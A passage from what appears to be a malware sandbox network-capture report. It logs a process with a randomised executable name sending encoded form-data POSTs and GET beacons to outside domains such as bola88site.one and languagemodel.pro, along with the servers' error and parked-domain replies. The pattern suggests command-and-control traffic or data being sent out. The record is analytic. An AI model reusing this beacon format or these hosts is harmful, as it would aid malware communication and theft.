20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                    Session ID: 11  |  Source IP: 192.168.2.4  |  Source Port: 49748  |  Destination IP: 172.96.191.39  |  Destination Port: 80  |  PID: 1880
                                                    Process: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp  |  Bytes transferred  |  Direction  |  Data
                                                    Sep 26, 2024 09:24:45.927192926 CEST  |  10918  |  OUT  |  POST /3qit/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.bola88site.one
                                                    Origin: http://www.bola88site.one
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 10303
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.bola88site.one/3qit/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 65 4f 33 33 4b 7a 46 49 66 54 69 66 6c 78 59 35 51 30 64 78 50 6c 51 41 43 45 38 2f 35 58 36 30 73 34 36 42 6d 4c 71 52 67 33 51 69 74 72 38 5a 64 78 42 73 62 52 44 6c 2b 48 42 64 39 66 49 31 36 61 7a 41 66 36 36 33 6f 4b 76 49 74 7a 4d 57 64 56 65 31 69 39 74 69 4e 78 4a 4a 32 73 58 36 52 39 34 32 56 2f 30 38 59 58 53 50 51 61 55 54 5a 4c 79 6c 4c 7a 65 59 34 71 41 6e 77 45 6a 66 39 39 78 6b 36 4c 50 69 35 44 6c 68 54 43 46 59 46 5a 6e 4f 58 61 4c 51 77 74 77 4c 6f 6b 78 6e 4a 37 6d 47 78 31 79 79 43 58 6d 4b 62 4c 64 57 52 4a 6b 50 74 64 77 7a 62 2f 77 6f 65 78 51 77 61 65 6d 76 79 65 56 73 43 39 37 79 43 30 52 6a 38 35 51 53 6a 78 35 4d 68 4c 50 5a 47 52 73 4f 51 5a 37 64 4b 2b 43 43 53 69 4b 46 79 76 73 76 76 5a 35 58 74 32 62 2f 68 6c 39 4c 61 5a 4c 4a 55 6a 66 44 6f 43 63 57 36 5a 46 6e 39 67 6b 33 69 77 74 48 49 4d 64 59 51 51 6d 4b 45 49 58 35 64 [TRUNCATED]
                                                    Data Ascii: y0qt3F=[TRUNCATED]
                                                    Sep 26, 2024 09:24:46.851675987 CEST  |  1033  |  IN  |  HTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 796
                                                    date: Thu, 26 Sep 2024 07:24:46 GMT
                                                    server: LiteSpeed
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                    Session ID: 12  |  Source IP: 192.168.2.4  |  Source Port: 49749  |  Destination IP: 172.96.191.39  |  Destination Port: 80  |  PID: 1880
                                                    Process: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp  |  Bytes transferred  |  Direction  |  Data
                                                    Sep 26, 2024 09:24:48.468880892 CEST  |  544  |  OUT  |  GET /3qit/?y0qt3F=t3sSYQcRGIG2xp6hThC36NAa5pulFT6rmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYRx0f6/FSPt3YGxqpBfNEWUCZ6CvMlkEJ/uE=&kZ=E8WpI HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.bola88site.one
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Sep 26, 2024 09:24:49.378112078 CEST  |  1033  |  IN  |  HTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 796
                                                    date: Thu, 26 Sep 2024 07:24:49 GMT
                                                    server: LiteSpeed
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    13 | 192.168.2.4 | 49750 | 217.70.184.50 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:24:59.492176056 CEST | 825 | OUT | POST /nxfn/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.languagemodel.pro
                                                    Origin: http://www.languagemodel.pro
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 203
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.languagemodel.pro/nxfn/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 44 6e 51 6e 36 6b 68 31 57 57 33 43 52 61 62 32 76 34 38 4d 45 50 69 54 49 43 71 4a 2b 4e 75 73 56 78 6f 50 4c 67 41 77 78 75 47 68 6c 6a 41 2f 42 79 6b 66 33 66 55 78 55 4b 52 57 56 56 33 33 6f 4d 4f 36 34 2b 69 4c 5a 6c 61 51 54 30 78 57 70 4b 44 2f 47 35 39 58 58 5a 78 72 78 6e 61 4e 4d 58 78 6f 43 4e 47 78 35 32 2b 49 77 4c 46 76 73 5a 54 6e 6e 32 51 6a 37 31 43 65 4b 64 4e 47 62 72 44 50 62 49 36 4e 62 51 2f 73 64 57 41 30 6a 47 31 67 64 45 41 71 74 59 49 54 69 37 5a 44 34 4a 4a 68 56 39 55 72 68 6a 57 4f 2f 68 57 34 63 57 76 56 2f 67 3d 3d
                                                    Data Ascii: y0qt3F=3hfisZtcaPw+DnQn6kh1WW3CRab2v48MEPiTICqJ+NusVxoPLgAwxuGhljA/Bykf3fUxUKRWVV33oMO64+iLZlaQT0xWpKD/G59XXZxrxnaNMXxoCNGx52+IwLFvsZTnn2Qj71CeKdNGbrDPbI6NbQ/sdWA0jG1gdEAqtYITi7ZD4JJhV9UrhjWO/hW4cWvV/g==
                                                    Sep 26, 2024 09:25:00.076214075 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                    Server: nginx
                                                    Date: Thu, 26 Sep 2024 07:24:59 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                    Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    14 | 192.168.2.4 | 49751 | 217.70.184.50 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:25:02.041214943 CEST | 845 | OUT | POST /nxfn/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.languagemodel.pro
                                                    Origin: http://www.languagemodel.pro
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 223
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.languagemodel.pro/nxfn/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 43 44 55 6e 34 47 4a 31 44 47 33 4e 50 71 62 32 6c 59 38 41 45 50 75 54 49 44 75 67 2f 2f 4b 73 56 51 59 50 4b 6b 55 77 79 75 47 68 33 44 42 31 46 79 6c 54 33 66 59 54 55 49 46 57 56 55 54 33 6f 49 47 36 35 4a 32 4b 62 31 61 53 59 55 78 55 32 36 44 2f 47 35 39 58 58 5a 6c 4e 78 6a 4f 4e 4d 6e 68 6f 46 66 75 79 78 57 2b 4c 34 72 46 76 6f 5a 54 6a 6e 32 52 30 37 33 32 6b 4b 66 31 47 62 75 2f 50 59 5a 36 4b 43 67 2b 6c 41 47 42 42 6d 31 51 75 56 42 73 37 6c 72 6b 6a 69 2f 73 6a 39 50 59 37 45 4d 31 38 7a 6a 79 39 69 6d 66 4d 52 56 53 63 6b 76 49 30 4f 4d 52 67 4d 39 50 72 73 42 33 44 46 77 79 50 78 77 49 3d
                                                    Data Ascii: y0qt3F=3hfisZtcaPw+CDUn4GJ1DG3NPqb2lY8AEPuTIDug//KsVQYPKkUwyuGh3DB1FylT3fYTUIFWVUT3oIG65J2Kb1aSYUxU26D/G59XXZlNxjONMnhoFfuyxW+L4rFvoZTjn2R0732kKf1Gbu/PYZ6KCg+lAGBBm1QuVBs7lrkji/sj9PY7EM18zjy9imfMRVSckvI0OMRgM9PrsB3DFwyPxwI=
                                                    Sep 26, 2024 09:25:02.640258074 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                    Server: nginx
                                                    Date: Thu, 26 Sep 2024 07:25:02 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                    Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    15 | 192.168.2.4 | 49752 | 217.70.184.50 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:25:04.581918001 CEST | 10927 | OUT | POST /nxfn/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.languagemodel.pro
                                                    Origin: http://www.languagemodel.pro
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 10303
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.languagemodel.pro/nxfn/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 43 44 55 6e 34 47 4a 31 44 47 33 4e 50 71 62 32 6c 59 38 41 45 50 75 54 49 44 75 67 2f 2f 43 73 56 43 51 50 4c 46 55 77 7a 75 47 68 30 44 42 30 46 79 6c 65 33 66 51 58 55 49 4a 6f 56 58 37 33 70 71 65 36 6f 49 32 4b 52 31 61 53 58 30 78 58 70 4b 44 75 47 35 73 51 58 5a 31 4e 78 6a 4f 4e 4d 69 6c 6f 54 64 47 79 33 57 2b 49 77 4c 46 56 73 5a 54 50 6e 32 49 42 37 33 7a 54 4b 75 56 47 62 4f 50 50 64 76 75 4b 4b 67 2b 72 42 47 42 5a 6d 31 73 6c 56 46 4e 58 6c 71 51 61 69 34 45 6a 2f 37 35 2b 57 4e 42 59 77 42 36 46 2b 31 6e 4d 53 55 79 52 6a 2f 67 51 50 2b 68 41 66 4d 76 70 32 54 71 64 63 44 2b 6b 69 45 56 61 6d 38 73 4c 70 58 45 4e 55 59 2f 4e 56 31 6b 72 6c 65 51 55 79 59 63 6f 62 64 6c 63 70 78 63 72 4e 4e 4c 6e 59 30 41 5a 53 42 4d 4a 39 59 4b 6c 50 6f 32 4a 79 33 70 68 34 73 66 42 43 61 4f 34 42 68 2f 6c 41 2f 4f 45 51 6d 53 6f 71 75 41 59 54 77 6b 4c 39 70 42 6a 74 35 4d 4b 56 33 5a 48 76 6d 36 4f 78 35 79 71 51 37 75 50 77 76 34 57 4b 75 30 [TRUNCATED]
                                                    Data Ascii: y0qt3F=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 [TRUNCATED]
                                                    Sep 26, 2024 09:25:05.171155930 CEST | 713 | IN | HTTP/1.1 502 Bad Gateway
                                                    Server: nginx
                                                    Date: Thu, 26 Sep 2024 07:25:05 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 568
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 [TRUNCATED]
                                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    16 | 192.168.2.4 | 49753 | 217.70.184.50 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:25:07.126127958 CEST | 547 | OUT | GET /nxfn/?y0qt3F=6j3CvtUhPdUgNSN69nh1RWvnIL+RhJE9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVeUaFaQwVg8/fN6RHd5lVuyrWHiNmavf3gAw=&kZ=E8WpI HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.languagemodel.pro
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Sep 26, 2024 09:25:07.759850979 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Thu, 26 Sep 2024 07:25:07 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Vary: Accept-Language
                                                    Data Raw: 37 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 [TRUNCATED]
                                                    Data Ascii: 79d<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>languagemodel.pro</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https: [TRUNCATED]
                                                    Sep 26, 2024 09:25:07.759877920 CEST | 914 | IN | Data Raw: 3d 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 3c 2f 73 74 72 6f 6e 67 3e 3c 2f
